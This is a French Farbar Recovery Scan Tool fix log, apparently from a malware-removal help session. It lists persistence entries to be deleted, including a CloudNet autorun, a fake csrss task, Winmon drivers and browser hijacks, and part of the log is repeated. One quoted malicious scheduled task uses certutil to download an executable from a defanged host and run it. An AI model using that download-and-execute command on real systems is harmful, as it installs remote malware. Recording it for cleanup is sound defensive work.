Publicité
Publicité
Format du document : text/plain
Prévisualisation
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 30-06-2019
Exécuté par nathan (02-07-2019 12:46:54) Run:2
Exécuté depuis C:\Users\nathan\Desktop
Profils chargés: nathan (Profils disponibles: nathan)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\Run: [CloudNet] => C:\Users\nathan\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-07-01] (EpicNet Inc.) [Fichier non signé]
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\MountPoints2: {1cdbc928-7ae7-11e8-8f04-309c237de986} - F:\setup.exe
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\MountPoints2: {77299983-6ef2-11e8-8724-309c237de986} - E:\setup.exe
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\MountPoints2: {7729998e-6ef2-11e8-8724-309c237de986} - F:\Install.exe
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\MountPoints2: {bc299b7e-6fe0-11e8-9ffc-309c237de986} - H:\setup.exe
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\75.0.3770.100\Installer\chrmstp.exe [2019-06-20] (Google LLC -> Google LLC)
BootExecute: autocheck autochk * SmartDefragBootTime.exe
GroupPolicy: Restriction - Chrome
CHR HKLM\SOFTWARE\Policies\Google: Restriction
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Defrag_is1
DeleteKey: HKCU\SOFTWARE\BDEsoft
DeleteKey: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\BDEsoft
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{0B98273D-9B99-44A9-98D8-B41F26CE4046}D:\jeux\fifa18\fifa18.exe
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{21556817-0DD1-421B-ACAC-7DA2C68F5990}D:\jeux\fifa18\fifa18.exe
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{ECC86769-7F66-4B10-8F5C-9236014AD6C2}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{EA422745-2A59-4210-9170-FC0F681D690D}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{B9306A65-8495-4668-896A-47A6EBC63B64}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{35C516B9-33DB-4BC7-97D5-E2FA37E346B5}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{B46674A1-E065-4ED0-B455-C03D8FCF3124}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{0DE91D78-08C0-4B2A-8131-6D960DF45E00}
C:\Windows\Installer\57f7ee1.msi
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32
unlock: C:\Windows\system32\drivers\8f00b204e9800998.sys
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\8f00b204e9800998
C:\Windows\system32\drivers\8f00b204e9800998.sys
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7665F26F-D11E-4498-A63E-08137544961B
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7665F26F-D11E-4498-A63E-08137544961B
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7665F26F-D11E-4498-A63E-08137544961B
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Maintenance\{7665F26F-D11E-4498-A63E-08137544961B
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7665F26F-D11E-4498-A63E-08137544961B
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{7665F26F-D11E-4498-A63E-08137544961B
C:\Windows\System32\Tasks\csrss
C:\Windows\rss\csrss.exe
DeleteValue: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|HiddenWildflower
DeleteValue: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|CloudNet
C:\Users\nathan\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
DeleteValue: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\Software\Microsoft\Windows\CurrentVersion\Run|HiddenWildflower
DeleteValue: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\Software\Microsoft\Windows\CurrentVersion\Run|CloudNet
C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
DeleteKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Machiner
DeleteKey: HKCU\SOFTWARE\EpicNet Inc.
DeleteKey: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\EpicNet Inc.
C:\Users\nathan\AppData\Roaming\EpicNet Inc
unlock: C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{6ABD440F-1FFB-4D0C-9583-5E4424CF0274}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{C9556D39-B9A6-43C4-810C-03A9B6D109BA}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{CC591A08-D941-407D-ADD0-5C82541F4712}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{20DD73F2-E149-466F-BB93-F299F8BE0AB4}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{76C79DF7-CFB6-4C67-A9B3-BCD16935B67B}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{AE7A5805-90E9-4FFF-9ED7-938DF6241B12}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{57E7BFC8-7693-4364-BA30-22F3DF4B0FBA}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{9ABD77F7-C23E-4E51-A7F1-968BE5FF2E5E}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{C56EF7C0-D85D-4FB2-BD8D-0DBE8B57ED74}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{6ABD440F-1FFB-4D0C-9583-5E4424CF0274}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{C9556D39-B9A6-43C4-810C-03A9B6D109BA}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{CC591A08-D941-407D-ADD0-5C82541F4712}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{20DD73F2-E149-466F-BB93-F299F8BE0AB4}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{76C79DF7-CFB6-4C67-A9B3-BCD16935B67B}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{AE7A5805-90E9-4FFF-9ED7-938DF6241B12}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{57E7BFC8-7693-4364-BA30-22F3DF4B0FBA}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{9ABD77F7-C23E-4E51-A7F1-968BE5FF2E5E}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{C56EF7C0-D85D-4FB2-BD8D-0DBE8B57ED74}
Task: {75F6A243-14B7-4B77-B1E9-6CD40BCB2166} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://fstyline.xyz/app/app.exe C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe /31340
Task: {7665F26F-D11E-4498-A63E-08137544961B} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [5161472 2019-07-01] () [Fichier non signé]
Task: {F7E55B26-44E1-46ED-BC51-75E09A93BFBB} - System32\Tasks\ewSXxaflLkNov2 => C:\Windows\system32\wscript.exe "C:\ProgramData\xpekMjRorgkcLnVB\HcCoFUY.wsf"
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErR1DGytAxJ2NzqtF9dPANsNo_Onure0_Fi6qpvpBxdx9emiUVWOlHKghequCMhfWmFpRBhKYPOHulyoCeZNXQ-rERvXwcj9kxg6BhDwMLSkriFhHFainxVFBHBDcoHt-kkQve9GzHO9fzvkMgAuqA2giNUmbClselIu9JNlNyhJA,&q={searchTerms}
CHR HomePage: Default -> hxxp://www.funnysearching.com/
R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] (Accès refusé)
S2 yzrnpmcu; C:\Windows\SysWOW64\yzrnpmcu\jhokjsqh.exe [0 0000-00-00] ()
S2 AdvancedSystemCareService12; C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe [X]
S3 Denuvo Kuser Data Driver 1.0.0.7; pas de ImagePath
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] ()
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider)
S3 AscFileControl; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscFileControl.sys [X]
S3 AscFileFilter; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscFileFilter.sys [X]
S3 AscRegistryFilter; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscRegistryFilter.sys [X]
S3 iobit_monitor_server; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\Monitor_win7_x64.sys [X]
U3 MBAMService; pas de ImagePath
2019-06-29 11:34 - 2019-07-02 09:16 - 000003184 _____ C:\Windows\System32\Tasks\csrss
2019-06-29 11:34 - 2019-06-29 11:34 - 000002890 _____ C:\Windows\System32\Tasks\ewSXxaflLkNov2
2019-06-29 11:15 - 2019-06-29 11:15 - 000000000 ____D C:\Windows\SysWOW64\yzrnpmcu
2019-06-29 11:15 C:\Windows\SysWOW64\yzrnpmcu
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
ShortcutWithArgument: C:\Users\nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () -> %SNP%
ShortcutWithArgument: C:\Users\nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () -> %SNP%
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () -> %SNP%
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () -> %SNP%
AlternateDataStreams: C:\Users\nathan\AppData\Local\Temp:$DATA [16]
EmptyTemp:
*****************
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => non trouvé(e)
"HKU\S-1-5-21-3514000543-3983533879-240645468-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => non trouvé(e)
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{1cdbc928-7ae7-11e8-8f04-309c237de986} => non trouvé(e)
HKLM\Software\Classes\CLSID\{1cdbc928-7ae7-11e8-8f04-309c237de986} => non trouvé(e)
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{77299983-6ef2-11e8-8724-309c237de986} => non trouvé(e)
HKLM\Software\Classes\CLSID\{77299983-6ef2-11e8-8724-309c237de986} => non trouvé(e)
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{7729998e-6ef2-11e8-8724-309c237de986} => non trouvé(e)
HKLM\Software\Classes\CLSID\{7729998e-6ef2-11e8-8724-309c237de986} => non trouvé(e)
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{bc299b7e-6fe0-11e8-9ffc-309c237de986} => non trouvé(e)
HKLM\Software\Classes\CLSID\{bc299b7e-6fe0-11e8-9ffc-309c237de986} => non trouvé(e)
HKLM\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} => non trouvé(e)
HKLM\System\CurrentControlSet\Control\Session Manager\\BootExecute => valeur restauré(es) avec succès
"C:\Windows\system32\GroupPolicy\Machine" => non trouvé(e)
HKLM\SOFTWARE\Policies\Google => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Defrag_is1 => non trouvé(e)
HKCU\SOFTWARE\BDEsoft => non trouvé(e)
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\BDEsoft => non trouvé(e)
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e)
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{0B98273D-9B99-44A9-98D8-B41F26CE4046}D:\jeux\fifa18\fifa18.exe" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{21556817-0DD1-421B-ACAC-7DA2C68F5990}D:\jeux\fifa18\fifa18.exe" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{ECC86769-7F66-4B10-8F5C-9236014AD6C2}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{EA422745-2A59-4210-9170-FC0F681D690D}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B9306A65-8495-4668-896A-47A6EBC63B64}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{35C516B9-33DB-4BC7-97D5-E2FA37E346B5}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B46674A1-E065-4ED0-B455-C03D8FCF3124}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0DE91D78-08C0-4B2A-8131-6D960DF45E00}" => non trouvé(e)
"C:\Windows\Installer\57f7ee1.msi" => non trouvé(e)
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
"C:\Windows\system32\drivers\8f00b204e9800998.sys" => a été déverrouillé
HKLM\SYSTEM\CurrentControlSet\Services\8f00b204e9800998 => impossible à supprimer, clé était peut-être protégé(e)
Exécuté par nathan (02-07-2019 12:46:54) Run:2
Exécuté depuis C:\Users\nathan\Desktop
Profils chargés: nathan (Profils disponibles: nathan)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\Run: [CloudNet] => C:\Users\nathan\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-07-01] (EpicNet Inc.) [Fichier non signé]
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\MountPoints2: {1cdbc928-7ae7-11e8-8f04-309c237de986} - F:\setup.exe
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\MountPoints2: {77299983-6ef2-11e8-8724-309c237de986} - E:\setup.exe
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\MountPoints2: {7729998e-6ef2-11e8-8724-309c237de986} - F:\Install.exe
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\...\MountPoints2: {bc299b7e-6fe0-11e8-9ffc-309c237de986} - H:\setup.exe
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\75.0.3770.100\Installer\chrmstp.exe [2019-06-20] (Google LLC -> Google LLC)
BootExecute: autocheck autochk * SmartDefragBootTime.exe
GroupPolicy: Restriction - Chrome
CHR HKLM\SOFTWARE\Policies\Google: Restriction
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Defrag_is1
DeleteKey: HKCU\SOFTWARE\BDEsoft
DeleteKey: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\BDEsoft
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{0B98273D-9B99-44A9-98D8-B41F26CE4046}D:\jeux\fifa18\fifa18.exe
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{21556817-0DD1-421B-ACAC-7DA2C68F5990}D:\jeux\fifa18\fifa18.exe
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{ECC86769-7F66-4B10-8F5C-9236014AD6C2}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{EA422745-2A59-4210-9170-FC0F681D690D}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{B9306A65-8495-4668-896A-47A6EBC63B64}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{35C516B9-33DB-4BC7-97D5-E2FA37E346B5}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{B46674A1-E065-4ED0-B455-C03D8FCF3124}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{0DE91D78-08C0-4B2A-8131-6D960DF45E00}
C:\Windows\Installer\57f7ee1.msi
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32
unlock: C:\Windows\system32\drivers\8f00b204e9800998.sys
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\8f00b204e9800998
C:\Windows\system32\drivers\8f00b204e9800998.sys
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7665F26F-D11E-4498-A63E-08137544961B
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7665F26F-D11E-4498-A63E-08137544961B
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7665F26F-D11E-4498-A63E-08137544961B
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Maintenance\{7665F26F-D11E-4498-A63E-08137544961B
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7665F26F-D11E-4498-A63E-08137544961B
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{7665F26F-D11E-4498-A63E-08137544961B
C:\Windows\System32\Tasks\csrss
C:\Windows\rss\csrss.exe
DeleteValue: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|HiddenWildflower
DeleteValue: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|CloudNet
C:\Users\nathan\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
DeleteValue: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\Software\Microsoft\Windows\CurrentVersion\Run|HiddenWildflower
DeleteValue: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\Software\Microsoft\Windows\CurrentVersion\Run|CloudNet
C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Administrateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
DeleteKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Machiner
DeleteKey: HKCU\SOFTWARE\EpicNet Inc.
DeleteKey: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\EpicNet Inc.
C:\Users\nathan\AppData\Roaming\EpicNet Inc
unlock: C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{6ABD440F-1FFB-4D0C-9583-5E4424CF0274}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{C9556D39-B9A6-43C4-810C-03A9B6D109BA}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{CC591A08-D941-407D-ADD0-5C82541F4712}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{20DD73F2-E149-466F-BB93-F299F8BE0AB4}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{76C79DF7-CFB6-4C67-A9B3-BCD16935B67B}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{AE7A5805-90E9-4FFF-9ED7-938DF6241B12}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{57E7BFC8-7693-4364-BA30-22F3DF4B0FBA}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{9ABD77F7-C23E-4E51-A7F1-968BE5FF2E5E}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{C56EF7C0-D85D-4FB2-BD8D-0DBE8B57ED74}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{6ABD440F-1FFB-4D0C-9583-5E4424CF0274}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{C9556D39-B9A6-43C4-810C-03A9B6D109BA}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{CC591A08-D941-407D-ADD0-5C82541F4712}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{20DD73F2-E149-466F-BB93-F299F8BE0AB4}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{76C79DF7-CFB6-4C67-A9B3-BCD16935B67B}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{AE7A5805-90E9-4FFF-9ED7-938DF6241B12}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{57E7BFC8-7693-4364-BA30-22F3DF4B0FBA}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{9ABD77F7-C23E-4E51-A7F1-968BE5FF2E5E}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{C56EF7C0-D85D-4FB2-BD8D-0DBE8B57ED74}
Task: {75F6A243-14B7-4B77-B1E9-6CD40BCB2166} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://fstyline.xyz/app/app.exe C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe /31340
Task: {7665F26F-D11E-4498-A63E-08137544961B} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [5161472 2019-07-01] () [Fichier non signé]
Task: {F7E55B26-44E1-46ED-BC51-75E09A93BFBB} - System32\Tasks\ewSXxaflLkNov2 => C:\Windows\system32\wscript.exe "C:\ProgramData\xpekMjRorgkcLnVB\HcCoFUY.wsf"
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErR1DGytAxJ2NzqtF9dPANsNo_Onure0_Fi6qpvpBxdx9emiUVWOlHKghequCMhfWmFpRBhKYPOHulyoCeZNXQ-rERvXwcj9kxg6BhDwMLSkriFhHFainxVFBHBDcoHt-kkQve9GzHO9fzvkMgAuqA2giNUmbClselIu9JNlNyhJA,&q={searchTerms}
CHR HomePage: Default -> hxxp://www.funnysearching.com/
R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] (Accès refusé)
S2 yzrnpmcu; C:\Windows\SysWOW64\yzrnpmcu\jhokjsqh.exe [0 0000-00-00] ()
S2 AdvancedSystemCareService12; C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe [X]
